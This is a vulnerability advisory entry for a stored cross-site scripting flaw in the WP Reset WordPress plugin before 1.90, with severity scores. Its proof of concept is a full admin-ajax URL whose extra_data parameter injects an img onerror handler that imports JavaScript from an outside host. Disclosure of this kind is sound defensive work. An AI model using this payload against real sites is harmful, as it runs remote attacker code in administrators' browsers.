Lucene search

K
wpvulndbM0zeWPVDB-ID:90CF8F9D-4D37-405D-B161-239BDB281828
HistoryJun 16, 2021 - 12:00 a.m.

WP Reset < 1.90 - Authenticated Stored XSS

2021-06-1600:00:00
m0ze
wpscan.com
9

0.001 Low

EPSS

Percentile

24.8%

The plugin did not sanitise or escape its extra_data parameter when creating a snapshot via the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue

PoC

PoC | Authenticated Persistent XSS | Enter snapshot name or brief description: https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&amp;tool;=create_snapshot&amp;extra;_data=<img src%3Dx onerror%3D%3Bimport(`%2F%2Fm0ze.ru%2Fpayload%2Fa.js`)%3B %2F%2F>

CPENameOperatorVersion
wp-resetlt1.90

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:90CF8F9D-4D37-405D-B161-239BDB281828